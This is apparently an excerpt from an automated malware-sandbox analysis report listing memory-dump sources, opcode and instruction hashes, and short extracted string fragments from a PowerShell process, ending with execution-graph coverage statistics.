                                                                                                                                                                            • Instruction ID: d0abcc099cc219d7013c237b0553a592e4e1266a250b3655d67a8c5ac4df0aa2
                                                                                                                                                                            • Opcode Fuzzy Hash: 687dc32cd4bcbb2c6aa58d42a6d5d3e021da3b4249e3a23fbefc25cadde0ccf7
                                                                                                                                                                            • Instruction Fuzzy Hash: 392138B2F00A01DBEF705E78950173E76A19FC0302F14407AC981EB681DF36C981C7A5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 894e0617d5798d8003e92196a864361e1f414f1460e4ae9a39679d99b191a5c8
                                                                                                                                                                            • Instruction ID: 6b4ac9f19bda9bdff07cc1093587277e83d363ff4fc4da424901878349e9e417
                                                                                                                                                                            • Opcode Fuzzy Hash: 894e0617d5798d8003e92196a864361e1f414f1460e4ae9a39679d99b191a5c8
                                                                                                                                                                            • Instruction Fuzzy Hash: 93126BB4A01216DFDB54CFA8C540EA9BBB2EF85304F15C059E906AB391C772ED82CB90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3d5cf2dfff49817149ce9506aab202249310249136296b0ea7d8ee0e1b36cc36
                                                                                                                                                                            • Instruction ID: d99135fe4fdebf5cbb3c58a77460afaf5da479772551a976b21a68580d9d1bbb
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d5cf2dfff49817149ce9506aab202249310249136296b0ea7d8ee0e1b36cc36
                                                                                                                                                                            • Instruction Fuzzy Hash: 29128DB4B002559FCB14CFA8C552F6ABBB2EF85304F14C069E9069B795CB72ED42CB91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521798286.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2be613ba4f2ef6d481077ffb7ea048473ebada1e8143880ac39d983cf7fa531a
                                                                                                                                                                            • Instruction ID: 6611fe5cd361a0d7adc4cbecb3b85663fba02a350f15b2cfce8b4dd7581e942d
                                                                                                                                                                            • Opcode Fuzzy Hash: 2be613ba4f2ef6d481077ffb7ea048473ebada1e8143880ac39d983cf7fa531a
                                                                                                                                                                            • Instruction Fuzzy Hash: A2124E74E05259DFCB05DFA8D494A9EBBB2FF88310F248159E845AB365C731ED82CB90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521798286.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8e9fe61cdc68a1d35b1c97ab6447d7e56888d20adea8d574494b86d5aedd8c42
                                                                                                                                                                            • Instruction ID: e77a2aae95aab136e334909266775a7215a8ba16c23379d14b8abd9cffac89cc
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e9fe61cdc68a1d35b1c97ab6447d7e56888d20adea8d574494b86d5aedd8c42
                                                                                                                                                                            • Instruction Fuzzy Hash: 98021E74A01219DFCB15DFA8D484A9EBBF2FF89310F248659E805AB355D731ED82CB90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521798286.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8552019290dfd7d95f5fac42131df851efdad870eddcd0529ef82e724fab763b
                                                                                                                                                                            • Instruction ID: 076798c206488af05b90c518a2797218c9a7878796f72e80032217134338865d
                                                                                                                                                                            • Opcode Fuzzy Hash: 8552019290dfd7d95f5fac42131df851efdad870eddcd0529ef82e724fab763b
                                                                                                                                                                            • Instruction Fuzzy Hash: B9022D74A01219DFDB05DFA8D894AADBBF2FF88310F248159E815AB365C731ED91CB90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$4'eq$4'eq$tPeq$tPeq$tPeq$tPeq$$eq
                                                                                                                                                                            • API String ID: 0-2390128903
                                                                                                                                                                            • Opcode ID: 58746b74276de7c5fd24ea0d8148f5b56b7d50cf1476aaefffaf225efe03719a
                                                                                                                                                                            • Instruction ID: e4602218339b0f40b4b17a7f2b30df1f60c89eecb11284f0307cb9b3d1a2a8c2
                                                                                                                                                                            • Opcode Fuzzy Hash: 58746b74276de7c5fd24ea0d8148f5b56b7d50cf1476aaefffaf225efe03719a
                                                                                                                                                                            • Instruction Fuzzy Hash: 51E117B1B0435ECFCB2A9B79C4057ABBBE2AF83610F14806AD506CB795DA31C9C1C791
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$tPeq$tPeq$$eq$$eq$$eq$jl$jl
                                                                                                                                                                            • API String ID: 0-3455636258
                                                                                                                                                                            • Opcode ID: 8e549e012b6efe60f091693f448c71d41e29673a0d95e3a1a153f18a9397d2ee
                                                                                                                                                                            • Instruction ID: 0eb7009d9945be7e4141817c01d99e2bbda9d558c438f2dd55df0c59d223f4a7
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e549e012b6efe60f091693f448c71d41e29673a0d95e3a1a153f18a9397d2ee
                                                                                                                                                                            • Instruction Fuzzy Hash: 588128B27142198FCB299E78980166BBBE3EFC3620F14806AD456CB751DB31CD82C7A1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$84rl$84rl$tPeq$tPeq$$eq$(kq$(kq$(kq
                                                                                                                                                                            • API String ID: 0-1626667988
                                                                                                                                                                            • Opcode ID: 65391d9a04846031da830891f88b6c3753cdb8d66be288959564ca8c2c488eed
                                                                                                                                                                            • Instruction ID: e45cf3b3dfc6cd8a27bb50636abb5257cdcb37814efdd7d8e24a13cb79bdbbec
                                                                                                                                                                            • Opcode Fuzzy Hash: 65391d9a04846031da830891f88b6c3753cdb8d66be288959564ca8c2c488eed
                                                                                                                                                                            • Instruction Fuzzy Hash: 7771B8B0A11205DFDB25CE64C544BEABBB2AF45310F1D8096E8069B391CB31DD45CBA1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Tdk$4'eq$4'eq$4'eq$4'eq$DUdk$XYtl$XYtl
                                                                                                                                                                            • API String ID: 0-719078150
                                                                                                                                                                            • Opcode ID: caf95fcb03fc087a7bab4a6282b3f2ac7c8f9c1891c68e513b2886a9b148923e
                                                                                                                                                                            • Instruction ID: 3771391d6481187c4615cd59753045bba99916df7d255a08bdbc852ba5ffb6ae
                                                                                                                                                                            • Opcode Fuzzy Hash: caf95fcb03fc087a7bab4a6282b3f2ac7c8f9c1891c68e513b2886a9b148923e
                                                                                                                                                                            • Instruction Fuzzy Hash: D2D1E6B2B04206CFCB659F79856566ABBA2FFC5220F34C0AAE406CB755DB31CD81C761
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 84rl$84rl$84rl$84rl$tPeq$tPeq$tPeq$tPeq
                                                                                                                                                                            • API String ID: 0-249424520
                                                                                                                                                                            • Opcode ID: 20e3c38fb18c3579ead4f0cae974cfd8f75bba1b21bdfa25966d9b28e4a65a8c
                                                                                                                                                                            • Instruction ID: 2bdc393bd6e37ead9d62a539feb27dfd584e46be35b412740f4c3b7ce5b03ef8
                                                                                                                                                                            • Opcode Fuzzy Hash: 20e3c38fb18c3579ead4f0cae974cfd8f75bba1b21bdfa25966d9b28e4a65a8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 22D1F471F002159FDB159F78C401A6ABBA2EFC9311F25846EE9469B381DB35DC82CBA1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 84rl$84rl$84rl$84rl$tPeq$tPeq$tPeq$tPeq
                                                                                                                                                                            • API String ID: 0-249424520
                                                                                                                                                                            • Opcode ID: b3171773c8c9c6b4961ff921f74c54252bd987b4bbcb40b8acb2b3ad4deada01
                                                                                                                                                                            • Instruction ID: a822f6b7ddc1189f1bf3965c8f8ead8c2d94d9d8584c1861bec0d3bc85228592
                                                                                                                                                                            • Opcode Fuzzy Hash: b3171773c8c9c6b4961ff921f74c54252bd987b4bbcb40b8acb2b3ad4deada01
                                                                                                                                                                            • Instruction Fuzzy Hash: AEC1DFB6F00218DFDF549F68C441AAABBE2FF88321F658459E8919B381CB31DD41CB91
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-3121479685
                                                                                                                                                                            • Opcode ID: 766ce33f953278df7e3b368711bca36ddf970668d00f81e41f2cf0909822aa28
                                                                                                                                                                            • Instruction ID: b4d6edbcb8e00a145af99347af55bd2bedf0585a3541c6878bea27c7fe451ba4
                                                                                                                                                                            • Opcode Fuzzy Hash: 766ce33f953278df7e3b368711bca36ddf970668d00f81e41f2cf0909822aa28
                                                                                                                                                                            • Instruction Fuzzy Hash: EDA105F1B44207EFCB659EF9854166BBBE2AF85210B14C07AD417CB392DB31C941DBA1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 84rl$84rl$XRjq$XRjq$XRjq$tPeq$tPeq$$eq
                                                                                                                                                                            • API String ID: 0-3991462700
                                                                                                                                                                            • Opcode ID: e1e904e646a571bd2fd3dafcd54aa832d711cfb180447642d6f123b18acc8214
                                                                                                                                                                            • Instruction ID: 9d73fcb22dac70350dba37cd0b6cd4ea5ceb092338a700d0048f547027a11d16
                                                                                                                                                                            • Opcode Fuzzy Hash: e1e904e646a571bd2fd3dafcd54aa832d711cfb180447642d6f123b18acc8214
                                                                                                                                                                            • Instruction Fuzzy Hash: AF71C8B1B001059FCF249F69D404AEABBE2EF89711F18C469E8169F395CB31DD42CBA1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$84rl$TQjq$TQjq$tPeq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-1750033891
                                                                                                                                                                            • Opcode ID: 927e5286bb6e86f60bf85e7ef9ee0f28b89dc0adbc2f926e702916ef7ca2754e
                                                                                                                                                                            • Instruction ID: dfad678a82ed0ecfbad5af449c068b5648b0e230a1cd0d21fc4323358da1c09d
                                                                                                                                                                            • Opcode Fuzzy Hash: 927e5286bb6e86f60bf85e7ef9ee0f28b89dc0adbc2f926e702916ef7ca2754e
                                                                                                                                                                            • Instruction Fuzzy Hash: D651D4B0600206DFDB65CE24C5147A67BF2BF86711F5D80AAE8079B391C776DC85CBA2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$84rl$84rl$tPeq$tPeq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-2393823326
                                                                                                                                                                            • Opcode ID: b8e49461f5756035f1f4cb59814486dcf5bdd682f75fe74bf7b91072b4121b1c
                                                                                                                                                                            • Instruction ID: 46d6443a2d6ca96e4cd1e22fba261b88b6846f84fb4956288782201e535a6fde
                                                                                                                                                                            • Opcode Fuzzy Hash: b8e49461f5756035f1f4cb59814486dcf5bdd682f75fe74bf7b91072b4121b1c
                                                                                                                                                                            • Instruction Fuzzy Hash: C35171B1B1010AEFDB25CF68C545BEB7BA2FB89350F298055E9026B785CB31DC81C7A1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: tPeq$tPeq$$eq$$eq$$eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-1424912048
                                                                                                                                                                            • Opcode ID: 462b4ce2a01b0af53b25f69bb84dc7b78d36b2f8c1695f14f0b984684c5d288c
                                                                                                                                                                            • Instruction ID: 10e6a2f149fa184f9b5451a5f85fcdabe88d08349a47be330d6f8c34997cf965
                                                                                                                                                                            • Opcode Fuzzy Hash: 462b4ce2a01b0af53b25f69bb84dc7b78d36b2f8c1695f14f0b984684c5d288c
                                                                                                                                                                            • Instruction Fuzzy Hash: 42414772B00615CFEF659A7DD80096ABBF5AFC5212B14806FD885CB292CE31DC41C7A1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: tPeq$tPeq$$eq$$eq$$eq$jl$jl
                                                                                                                                                                            • API String ID: 0-26845198
                                                                                                                                                                            • Opcode ID: 6b6f7bc6718f674d3a9c87c886db2fd5886bb0cd5179b65c975637b5d6cb170a
                                                                                                                                                                            • Instruction ID: 9836f4d83cc60599dfbe3374f2e0a0d31697ccea00407fd53c9b54e63487814b
                                                                                                                                                                            • Opcode Fuzzy Hash: 6b6f7bc6718f674d3a9c87c886db2fd5886bb0cd5179b65c975637b5d6cb170a
                                                                                                                                                                            • Instruction Fuzzy Hash: 43513DB2304365CFC7655A79D400667BBE5EFC6624B2884EFD646CB392CA32CC41C7A5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$84rl$d%kq$d%kq$d%kq$tPeq$$eq
                                                                                                                                                                            • API String ID: 0-1946441413
                                                                                                                                                                            • Opcode ID: 184b63abad7ae2157e93e7a3127320b9fa6b053f6df4a45a900e66e9e6f6d3dc
                                                                                                                                                                            • Instruction ID: 1c10dc162cf1b11c488423cf61c6d21a96f2ba8bbb49db27a7c6bfe7ee713f83
                                                                                                                                                                            • Opcode Fuzzy Hash: 184b63abad7ae2157e93e7a3127320b9fa6b053f6df4a45a900e66e9e6f6d3dc
                                                                                                                                                                            • Instruction Fuzzy Hash: D351C4F2A10216DFCB248F24CA45BAABBB2BF45350F188195E8039B791C737DD81CB61
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$Pi$Pi
                                                                                                                                                                            • API String ID: 0-205652726
                                                                                                                                                                            • Opcode ID: ad0152a1ee1f578a9cff7f39fabf4a0508ecab7dcefc1c5a0aeb45f53016ac0c
                                                                                                                                                                            • Instruction ID: ece63c7d594cafee5e539e32617d321fb72dbd044e62d62a61322c6aece4ae8f
                                                                                                                                                                            • Opcode Fuzzy Hash: ad0152a1ee1f578a9cff7f39fabf4a0508ecab7dcefc1c5a0aeb45f53016ac0c
                                                                                                                                                                            • Instruction Fuzzy Hash: B9C17DB4E00A04DFDB14DFA8C551AAABBB2AFC8311F24C169D8456B744DB32EC42CB91
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$Pi$Pi
                                                                                                                                                                            • API String ID: 0-205652726
                                                                                                                                                                            • Opcode ID: bea7788adbaab817f9096e09baf9b9042c13eca7dd95fa2978b33a1f2cc0afdb
                                                                                                                                                                            • Instruction ID: 361872121e61ace2e273a9ea8acc97f242d6ff2349e05fc72c15e2257b350313
                                                                                                                                                                            • Opcode Fuzzy Hash: bea7788adbaab817f9096e09baf9b9042c13eca7dd95fa2978b33a1f2cc0afdb
                                                                                                                                                                            • Instruction Fuzzy Hash: F27160F0E10206DFCB15DF68C551AAABBB2AF89314F14C069D806AF755CB72ED81CB91
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$84rl$d%kq$d%kq$d%kq$tPeq
                                                                                                                                                                            • API String ID: 0-407560531
                                                                                                                                                                            • Opcode ID: c580213d4d4919ec27d81046178638172e5fae84060975d8674e98c3ab7cc3a9
                                                                                                                                                                            • Instruction ID: 89ed52af29aa2dd8ae047fe8bf5d8313d4a509419d8ae08252bccb9813756cdf
                                                                                                                                                                            • Opcode Fuzzy Hash: c580213d4d4919ec27d81046178638172e5fae84060975d8674e98c3ab7cc3a9
                                                                                                                                                                            • Instruction Fuzzy Hash: 5031B6B1B00215DFC724DF68C544A6ABBA3FF49714F258195E8079B341C732EC41CB90
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$4'eq$4'eq$$eq
                                                                                                                                                                            • API String ID: 0-471562182
                                                                                                                                                                            • Opcode ID: 64ca0848d4ade2572cfe056b336f3d1fea3d323c3dc24f6e8c413759e807bcf7
                                                                                                                                                                            • Instruction ID: 8fd7ce6083faff96a64068a4a46ce9ae7a9d99647f974915628b464f7ebc4810
                                                                                                                                                                            • Opcode Fuzzy Hash: 64ca0848d4ade2572cfe056b336f3d1fea3d323c3dc24f6e8c413759e807bcf7
                                                                                                                                                                            • Instruction Fuzzy Hash: 1BA1F1F1B04256DFCB169E78C4116BBBBF2AF96211F18C0AAD45ACB351DB31C982C791
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$tPeq$tPeq$$dk
                                                                                                                                                                            • API String ID: 0-2308709311
                                                                                                                                                                            • Opcode ID: d65e361a280eaab2003f559c405fc77a58d1c530506275f0f0e2d9ba6937aac7
                                                                                                                                                                            • Instruction ID: c22bd41ab0c2b76017ae65ec2004b43bb93a1bd063e18dc62cc3fe7724b863dc
                                                                                                                                                                            • Opcode Fuzzy Hash: d65e361a280eaab2003f559c405fc77a58d1c530506275f0f0e2d9ba6937aac7
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E8137F1B1422A9FCF259A78840176BBBE2AF85310F18C4BAD607CB781DB31D945C7A1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-2942138008
                                                                                                                                                                            • Opcode ID: 8193e10f6f79af38b1a842a389b47ba6975af0c16d8b512cbd94baf916fe868c
                                                                                                                                                                            • Instruction ID: e7799fec6a9fbd241abc30e8864bf452efbb28251943d2fa314d9a44e7fa8b38
                                                                                                                                                                            • Opcode Fuzzy Hash: 8193e10f6f79af38b1a842a389b47ba6975af0c16d8b512cbd94baf916fe868c
                                                                                                                                                                            • Instruction Fuzzy Hash: 827123F171421ADFCB259E79D4406AABBA2EF85310F14C06AE40F8B796DB31CD82C791
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 84rl$84rl$tPeq$tPeq$$eq
                                                                                                                                                                            • API String ID: 0-1462105900
                                                                                                                                                                            • Opcode ID: 5e42f8285c68676a0d139b7214df51f81cfd075825e71674802cd247cb39c0e3
                                                                                                                                                                            • Instruction ID: a8d3c3d25a8a29772dd93351605bae38e6ffff6e9f7d12e6c42bdc89bf52ea45
                                                                                                                                                                            • Opcode Fuzzy Hash: 5e42f8285c68676a0d139b7214df51f81cfd075825e71674802cd247cb39c0e3
                                                                                                                                                                            • Instruction Fuzzy Hash: D36108B1B001059FCB159F789445AEABBE2FF85710F28C069E416AF396CB35DD42CBA1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-2942138008

Execution Graph

Execution Coverage: 9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 14.9%
Total number of Nodes: 329
Total number of Limit Nodes: 24
